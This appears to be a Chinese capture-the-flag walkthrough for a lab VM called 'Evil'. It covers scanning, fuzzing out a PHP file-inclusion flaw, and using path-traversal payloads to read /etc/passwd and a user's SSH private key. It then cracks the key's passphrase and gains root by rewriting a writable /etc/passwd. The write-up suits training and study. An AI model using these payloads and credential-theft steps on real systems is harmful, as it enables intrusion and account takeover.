当前位置: 首页 > news >正文

Evil靶场

news 2025/8/10 11:42:43

Evil

1.主机发现

  • 使用命令探测存活主机,80.139是kali的地址,所以靶机地址就是80.134
fping -gaq 192.168.80.0/24

在这里插入图片描述

2.端口扫描

  • 开放80,22端口
nmap -Pn -sV -p- -A 192.168.80.134

在这里插入图片描述

3.信息收集

  • 访问web界面

    在这里插入图片描述

  • 路径扫描

    gobuster dir -u http://192.168.80.134 -w /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -x txt,php,html,jsp

    在这里插入图片描述

  • 访问robots.txt

    在这里插入图片描述

  • 访问/secret ,发现是空页面

    在这里插入图片描述

  • 继续对/secret进行路径扫描

    gobuster dir -u http://192.168.80.134/secret -w /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -x txt,php,html,jsp

    在这里插入图片描述

  • 访问/evil.php,依然返回空页面

    在这里插入图片描述

  • 尝试对/evil.php的参数进行爆破,并没有探测出参数信息

    ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:KEY -w value.txt:VAL -u http://192.168.80.134/secret/evil.php?KEY=VAL -fs 0

    在这里插入图片描述

    在这里插入图片描述

  • 尝试/evil.php是否存在文件包含,目前已知根目录下的robots.txt文件是真实存在的,所以尝试对其再次进行文件包含探测;发现一个command参数

    ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:DIR -u http://192.168.80.134/secret/evil.php?DIR=../robots.txt -fs 0

    在这里插入图片描述

  • 验证command参数是否真正存在文件包含

    在这里插入图片描述

4.利用文件包含漏洞

  • 读取/etc/passwd文件

    在这里插入图片描述

  • 使用PHP协议封装读取evil.php源文件

    /secret/evil.php?command=php://filter/convert.base64-encode/resource=evil.php

    在这里插入图片描述

  • 对获得的字符串进行base64解码

    在这里插入图片描述

    <?php$filename = $_GET['command'];include($filename);
?>

  • 尝试写入文件,内容为123的base64编码后的字符串

    /secret/evil.php?command=php://filter/write=convert.base64-decode/resource=glc.php&txt=MTIz

    在这里插入图片描述

  • 尝试访问刚才写入的文件,发现没有给文件,证明写入失败

    在这里插入图片描述

5.尝试ssh登录

  • 刚才我们发现没有文件写入权限,那我们就换个思路,还记得我们当时读取的/etc/passwd文件吗,自己研究一下发现了一个mowree用户,尝试对其进行ssh登录

    在这里插入图片描述

  • 我们发现mowree用户允许公钥和密码登录两种方式

    ssh mowree@192.168.80.134 -v

    在这里插入图片描述

  • 那我们可以利用文件包含漏洞去读取mowree用户的公私钥文件

    • 公钥文件,发现是rsa加密的

      /secret/evil.php?command=../../../../../../home/mowree/.ssh/authorized_keys

      在这里插入图片描述

    • 私钥文件

      /secret/evil.php?command=../../../../../../home/mowree/.ssh/id_rsa

      在这里插入图片描述

  • 查看网站源码,将私钥文件的内容复制到本地,并给文件赋予权限,尝试ssh登录,发现需要passphrase(ssh-key 的密语字符串)

    在这里插入图片描述

  • 对passphrase进行爆破

    • 将id_rsa文件转换为john命令能够识别的文件

      ./ssh2john.py ~/id_rsa > ~/glc

      在这里插入图片描述

    • 使用john进行爆破,爆破成功,密码为unicorn

      john glc --wordlist=/usr/share/wordlists/rockyou.txt

      在这里插入图片描述

6.获得shell

  • ssh登录mowree用户

    在这里插入图片描述

  • 拿到第一个flag

    在这里插入图片描述

7.提权

  • 查看内核版本和发行版本

    在这里插入图片描述

  • 内核版本4.19.0-17;发行版本 Debian10

  • 使用msf提权发现都提权失败了,有兴趣的可以自己试一下

  • 换个思路,查看存在写权限的文件

    find / -writable 2>/dev/null | grep -v proc

    在这里插入图片描述

  • 发现对/etc/passwd文件具有写权限,那么问题就变得简单了,直接修改文件中root账号的密码就可以啦

  • 生成一个加密密码,密码为root

    openssl passwd -1

    在这里插入图片描述

    在这里插入图片描述

  • 尝试用修改的密码登录root账号,成功提权,获得第二个flag

    在这里插入图片描述

http://www.lryc.cn/news/233816.html

相关文章:

  • 第77题. 组合
  • 读书笔记:彼得·德鲁克《认识管理》第21章 企业与政府
  • C/C++疫情集中隔离 2021年12月电子学会青少年软件编程(C/C++)等级考试一级真题答案解析
  • 052-第三代软件开发-系统监测
  • 向量矩阵范数pytorch
  • NVIDIA Jetson OTA升级
  • 【算法】算法题-20231118
  • 某60区块链安全之整数溢出漏洞实战学习记录
  • 图数据库Neo4J 中文分词查询及全文检索(建立全文索引)
  • element-china-area-data使用问题
  • 248: vue+openlayers 以静态图片作为底图,并在上面绘制矢量多边形
  • thinkphp6(TP6)访问控制器报404(Nginx)
  • 腾讯云轻量应用服务器使用场景列举说明
  • 【漏洞复现】IP-guard WebServer 远程命令执行
  • 23111704[含文档+PPT+源码等]计算机毕业设计springboot办公管理系统oa人力人事办公
  • 在Linux系统上检测GPU显存和使用情况
  • 内网穿透 cpolar
  • ai剪辑矩阵系统源码+无人直播系统源码技术开发
  • 2311rust,到38版本更新
  • 腾讯云4核8G服务器配置价格表,轻量和CVM标准型S5实例
  • Android 屏幕适配
  • Python使用Mechanize库完成自动化爬虫程序
  • 【Shell脚本入门】
  • redis大全
  • linux rsyslog日志采集格式设定五
  • uni-app:如何配置uni.request请求的超时响应时间(全局+局部)
  • AI中文版怎么用,版本分享,GPT官网入口
  • mysql数据库通过binlog恢复数据
  • 【unity插件】UGUI的粒子效果(UI粒子)—— Particle Effect For UGUI (UI Particle)
  • 高教社杯数模竞赛特辑论文篇-2023年C题:基于历史数据的蔬菜类商品定价与补货决策模型(附获奖论文及R语言和Python代码实现)(中)